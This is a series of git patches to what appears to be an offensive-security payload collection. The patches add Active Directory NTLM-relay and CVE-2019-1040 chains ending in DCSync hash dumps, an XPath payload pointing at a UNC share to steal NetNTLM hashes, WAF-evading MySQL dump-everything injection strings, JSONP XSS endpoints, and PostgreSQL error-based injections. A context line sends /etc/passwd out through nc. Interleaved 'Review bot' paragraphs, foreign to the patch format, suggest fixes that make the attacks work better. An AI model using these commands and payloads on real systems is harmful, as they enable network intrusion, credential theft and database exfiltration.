From 11fc6e4bc5c283a3b0bf0517d7a72f63956d1e41 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 20 Oct 2019 22:09:36 +0200 Subject: [PATCH 01/15] NTLM relay + MS08-068 --- .../Active Directory Attack.md | 57 ++++++++++++++++++- 1 file changed, 55 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3140024..7685d9c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -23,6 +23,8 @@ * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) + * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) + * [SMB Signing Disabled](#smb-signing-disabled) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [Unconstrained delegation](#unconstrained-delegation) 
@@ -658,12 +660,62 @@ hashcat -m 5600 -a 0 hash.txt crackstation.txt ### NTLMv2 hashes relaying +NTLMv1 and NTLMv2 can be relayed to connect to another machine. + +| Hash | Hashcat | Attack method | +|---|---|---| +| LM | 3000 | crack/pass the hash | +| NTLM/NTHash | 1000 | crack/pass the hash | +| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack | +| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack | + +#### MS08-068 NTLM reflection + +NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008. + +> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials. + +* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068 + +```powershell +msf > use exploit/windows/smb/smb_relay +msf exploit(smb_relay) > show targets +``` + +#### SMB Signing Disabled + If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. 1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`. + ```powershell + [Responder Core] + ; Servers to start + ... + SMB = Off # Turn this off + HTTP = Off # Turn this off + ``` 2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. 3. Run `python Responder.py -I ` and `python MultiRelay.py -t -u ALL` -4. Wait for a shell +4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list. + ```powershell + ntlmrelayx.py -tf targets.txt + ``` +5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. 
+ ```powershell + $ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support + [*] Servers started, waiting for connections + Type help for list of commands + ntlmrelayx> socks + Protocol Target Username Port + -------- -------------- ------------------------ ---- + MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 + SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 + MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 + + $ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1 + $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth + ``` + ### Dangerous Built-in Groups Usage @@ -1042,4 +1094,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) * [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) * [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) -* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) \ No newline at end of file +* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) \ No newline at end of file From 727eb5cabd2bf265813f0d0376912dc3c86c3acb Mon Sep 17 00:00:00 2001 
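Review bot: in the SMB Signing Disabled hunk, step 3 has lost its arguments: `python Responder.py -I ` and `python MultiRelay.py -t -u ALL` show nothing after `-I` and `-t` (angle-bracket placeholders were most likely swallowed by the renderer), so spell them out as plain words, e.g. `python Responder.py -I eth0` and `python MultiRelay.py -t TARGET_IP -u ALL`. Two smaller points in the same hunk: the condition that matters is whether signing is required, not whether it is enabled, since a host with signing enabled but not enforced is still relayable and that is what the RunFinger check reflects; and step 4's `ntlmrelayx.py -tf targets.txt` should carry `-smb2support` like the SOCKS example in step 5, otherwise SMB2-only clients cannot be relayed. In the MS08-068 hunk, `protocolOnly` needs a full stop and a space, and the scope sentence reads better as "Affects Windows 2000 through Windows Server 2008 only"; step 5's "SOCK proxy with every compromised sessions" should be "SOCKS proxy for every compromised session".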
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 21 Oct 2019 23:00:27 +0200 Subject: [PATCH 02/15] Drop the MIC --- .../Active Directory Attack.md | 36 ++++++++++++++++++- 1 file changed, 35 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7685d9c..51d7003 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -25,6 +25,7 @@ * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) * [SMB Signing Disabled](#smb-signing-disabled) + * [Drop the MIC](#drop-the-mic) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [Unconstrained delegation](#unconstrained-delegation) 
@@ -716,6 +717,37 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth ``` +#### Drop the MIC + +> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP + +Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) + +```powershell +python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' +[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth +[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected) +``` + +- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD + ```powershell + TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local + TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support + TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc + ``` + + +- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. 
+ ```powershell + # create a new machine account + TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support + TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6 + TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME + + # connect using the ticket + export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache + secretsdump.py -k -no-pass second-dc-server.local -just-dc + ``` ### Dangerous Built-in Groups Usage @@ -1095,4 +1127,6 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) * [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) * [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) -* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) \ No newline at end of file +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) +* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) +* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) \ No newline at end of file From c6b5bbab2b577d3a488abd451bd23cc858ce5b73 Mon Sep 17 00:00:00 2001 
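Review bot: in the Drop the MIC hunk the two scenarios disagree on how printerbug.py is invoked: the first runs `python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local` with no attacker host, while the second passes one (`... @second-dc-server 10.0.2.6`); the script needs the listener address to make the victim connect back, so add it to the first example as well. The TERM1/TERM2 order in the first scenario also lists the trigger before the listener; start `ntlmrelayx.py` first, then fire printerbug. In the second scenario the host names drift: the relay targets `ldaps://rlt-dc.relaytest.local` and printerbug hits `second-dc-server`, but getST.py and secretsdump.py use `second-dc-server.local`, which is not in the `relaytest.local` domain; pick one FQDN and use it throughout. The `# create a new machine account` comment above the ntlmrelayx line is correct because `--delegate-access` creates the account, but the text should say that the account name and password printed by ntlmrelayx are what go into `'relaytest.local/MACHINE$:PASSWORD'`. Lastly, the first scenario only yields DCSync because the relayed identity is an Exchange server's computer account, which holds WriteDACL on the domain object in a default Exchange install; one sentence stating that would explain why an Exchange server is the chosen victim.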
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 22 Oct 2019 20:26:04 +0200 Subject: [PATCH 03/15] fix TOC links --- Server Side Request Forgery/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 46070c9..b9c47ac 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -8,17 +8,17 @@ * [Payloads with localhost](#payloads-with-localhost) * [Bypassing filters](#bypassing-filters) * [Bypass using HTTPS](#bypass-using-https) - * [Bypass localhost with [::]](#bypass-localhost-with----) + * [Bypass localhost with [::]](#bypass-localhost-with-) * [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection) * [Bypass localhost with CIDR](#bypass-localhost-with-cidr) * [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location) - * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding) + * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding) * [Bypass using malformed urls](#bypass-using-malformed-urls) * [Bypass using rare address](#bypass-using-rare-address) * [Bypass using bash variables](#bypass-using-bash-variables) * [Bypass using tricks combination](#bypass-using-tricks-combination) * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics) - * [Bypass filter_var() php function](#bypass-filter-var-php-function) + * [Bypass filter_var() php function](#bypass-filter_var-php-function) * [Bypass against a weak parser](#bypass-against-a-weak-parser) * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme) * [file://](#file) 
@@ -668,4 +668,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) - [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) - [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) -- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) \ No newline at end of file +- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) From 88f020381ddcefc96a3fb9125fa398b6f74ba76a Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 22 Oct 2019 23:06:35 +0200 Subject: [PATCH 04/15] Out of band XPATH --- XPATH Injection/README.md | 27 +++++++++++++++++++++------ 1 file changed, 21 insertions(+), 6 deletions(-) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index 4b2eddc..12bb05e 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -1,6 +1,13 @@ # XPATH injection -XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. +> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. + +## Summary + +* [Exploitation](#exploitation) +* [Blind exploitation](#blind-exploitation) +* [Out Of Band Exploitation](#out-of-band-exploitation) +* [References](#references) ## Exploitation 
@@ -24,16 +31,24 @@ x' or name()='username' or 'x'='y ## Blind Exploitation -```sql 1. Size of a string -and string-length(account)=SIZE_INT - + ```sql + and string-length(account)=SIZE_INT + ``` 2. Extract a character -substring(//user[userid=5]/username,2,1)=CHAR_HERE -substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) + ```sql + substring(//user[userid=5]/username,2,1)=CHAR_HERE + substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) + ``` + +## Out Of Band Exploitation + +```powershell +http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') ``` ## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) * [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) +* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) From 5b59da70f7dfe4b091c2b33d9d97ab74b9f0bdeb Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Fri, 25 Oct 2019 18:11:11 +0530 Subject: [PATCH 05/15] Update MySQL Injection.md Added 6 MYSQL DIOS * Zen * Zen WAF * ~tr0jAn WAF * ~tr0jAn Benchmark * N1Z4M * sharik --- SQL Injection/MySQL Injection.md | 20 +++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 6574bb0..f61cc52 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md 
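Review bot: in the Out Of Band Exploitation hunk the payload `and doc('//10.10.10.10/SHARE')` relies on the `doc()` function, which only exists in XPath 2.0 / XQuery processors (Saxon, BaseX and similar); libxml2 and other XPath 1.0 engines reject it, so state that requirement next to the payload. The same applies to `codepoints-to-string()` in the Blind Exploitation block above it. It would also help to spell out the effect: on a Windows host the UNC path makes the server open an SMB connection to 10.10.10.10, which is what the added NetNTLM reference describes, so the attacker needs Responder or another listener there to capture the hash. The fence is tagged `powershell` although the content is a URL; `text` would be less misleading.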
@@ -266,6 +266,24 @@ make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51 -- M@dBl00d (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)) + +-- Zen ++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) + +-- Zen WAF +(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a) + +-- ~tr0jAn WAF ++concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 
0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/+ + +-- ~tr0jAn Benchmark ++concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 
1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)+ + +-- N1Z4M WAF ++/*!13337concat*/(0x3c616464726573733e3c63656e7465723e3c62723e3c68313e3c666f6e7420636f6c6f723d22526564223e496e6a6563746564206279204e315a344d3c2f666f6e743e3c68313e3c2f63656e7465723e3c62723e3c666f6e7420636f6c6f723d2223663364393361223e4461746162617365207e3e3e203c2f666f6e743e,database/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643936223e56657273696f6e207e3e3e203c2f666f6e743e,@@version,0x3c62723e3c666f6e7420636f6c6f723d2223306637363964223e55736572207e3e3e203c2f666f6e743e,user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643365223e506f7274207e3e3e203c2f666f6e743e,@@port,0x3c62723e3c666f6e7420636f6c6f723d2223346435613733223e4f53207e3e3e203c2f666f6e743e,@@version_compile_os,0x2c3c62723e3c666f6e7420636f6c6f723d2223366134343732223e44617461204469726563746f7279204c6f636174696f6e207e3e3e203c2f666f6e743e,@@datadir,0x3c62723e3c666f6e7420636f6c6f723d2223333130343362223e55554944207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223363930343637223e43757272656e742055736572207e3e3e203c2f666f6e743e,current_user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223383432303831223e54656d70204469726563746f7279207e3e3e203c2f666f6e743e,@@tmpdir,0x3c62723e3c666f6e7420636f6c6f723d2223396336623934223e424954532044455441494c53207e3e3e203c2f666f6e743e,@@version_compile_machine,0x3c62723e3c666f6e7420636f6c6f723d2223396630613838223e46494c452053595354454d207e3e3e203c2f666f6e743e,@@CHARACTER_SET_FILESYSTEM,0x3c62723e3c666f6e7420636f6c6f723d2223393234323564223e486f7374204e616d65207e3e3e203c2f666f6e743e,@@hostname,0x3c62723e3c666f6e7420636f6c6f723d2223393430313333223e53797374656d2055554944204b6579207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223613332363531223e53796d4c696e6b20207e3e3e203c2f666f6e743e,@@GLOBAL.have_symlink,0x3c62723e3c666f6e7420636f6c6f723d2223353830633139223e53534c207e3e3e203c2f666f6e743e,@@GLOBAL.h
ave_ssl,0x3c62723e3c666f6e7420636f6c6f723d2223393931663333223e42617365204469726563746f7279207e3e3e203c2f666f6e743e,@@basedir,0x3c62723e3c2f616464726573733e3c62723e3c666f6e7420636f6c6f723d22626c7565223e,(/*!13337select*/(@a)/*!13337from*/(/*!13337select*/(@a:=0x00),(/*!13337select*/(@a)/*!13337from*/(information_schema.columns)/*!13337where*/(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=/*!13337concat*/(@a,table_schema,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,table_name,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,column_name,0x3c62723e))))a))+ + +-- sharik +(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a) ``` ## MYSQL Current queries @@ -377,4 +395,4 @@ load data infile '\\\\error\\abc' into table database.table_name; - [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123) - [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased) - [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100) -- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases) \ No newline at end of file +- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases) From aef5bb864ae2050c7b8e071b3a39742a4918a1c9 Mon Sep 17 00:00:00 2001 
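Review bot: in the MySQL DIOS hunk the `-- Zen` payload `+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,...` looks like a repeat of the make_set payload already present in the context line above it (`make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51...`); diff the two and drop the duplicate if they match. The new entries also mix raw and URL-encoded characters (`%0a`, `%2b`, leading and trailing `+`) without saying so; a one-line note that these are meant to be sent URL-encoded (`+` is a space, `%2b` a literal plus) would spare readers a broken copy-paste. Most of the hex literals (`0x3c62723e` is `<br>`, the long ones are coloured `<font>` banners crediting the author) are presentation rather than technique; trimming them to the functional core would make the payloads readable and far shorter.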
From: nizam0906 Date: Fri, 25 Oct 2019 22:27:16 +0530 Subject: [PATCH 06/15] Update jsonp_endpoint.txt Added 3 yahoo jsonp endpoints * https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337) * https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337) * https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y- --- XSS Injection/Intruders/jsonp_endpoint.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/XSS Injection/Intruders/jsonp_endpoint.txt b/XSS Injection/Intruders/jsonp_endpoint.txt index e514d81..12add24 100644 --- a/XSS Injection/Intruders/jsonp_endpoint.txt +++ b/XSS Injection/Intruders/jsonp_endpoint.txt @@ -24,6 +24,9 @@ #Uber.com: "> #AOL/Yahoo +"> +"> +"> "> "> "> @@ -51,4 +54,4 @@ #GoogleAPI's "> "> -ng-app"ng-csp ng-click=$event.view.alert(1337)> \ No newline at end of file +ng-app"ng-csp ng-click=$event.view.alert(1337)> From f35ace93cf0655bbec0a753103899650e7a8b489 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Sat, 26 Oct 2019 18:07:14 +0530 Subject: [PATCH 07/15] Update PostgreSQL Injection.md Updated PostgreSQL Error Based injections --- SQL Injection/PostgreSQL Injection.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index c75ee73..b8d962d 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md 
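Review bot: in patch 06 (jsonp_endpoint.txt) the three new AOL/Yahoo lines render here as bare `">` fragments, so the actual `src` URLs are only recoverable from the commit message; confirm that the committed lines carry the full script tags like the neighbouring entries. The third one, suggest-shop.yahooapis.jp, embeds a specific `appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-`; that key belongs to whoever registered it and will stop working once rotated, so either mark it as a placeholder or note that readers need their own app id.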
@@ -25,8 +25,13 @@ ```sql ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- -,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- +,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) + +' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1 +' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1 +' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1 +' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ``` ## PostgreSQL Blind @@ -95,4 +100,4 @@ SELECT system('cat /etc/passwd | nc '); * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) -* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) \ No newline at end of file +* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) 
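Review bot: in the PostgreSQL Error Based hunk the new `cast(... as int)` payloads only work when the database's `invalid input syntax` error is echoed back to the client; a line saying the technique needs verbose errors would set expectations. `concat()` was added in PostgreSQL 9.1, so `'DATABASE: '||current_database()` is the more portable spelling for older targets. The change of `table_name=data_column` to `table_name='data_table'` on the existing cAsT line is the right fix, since the column list has to be filtered by a quoted table name.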
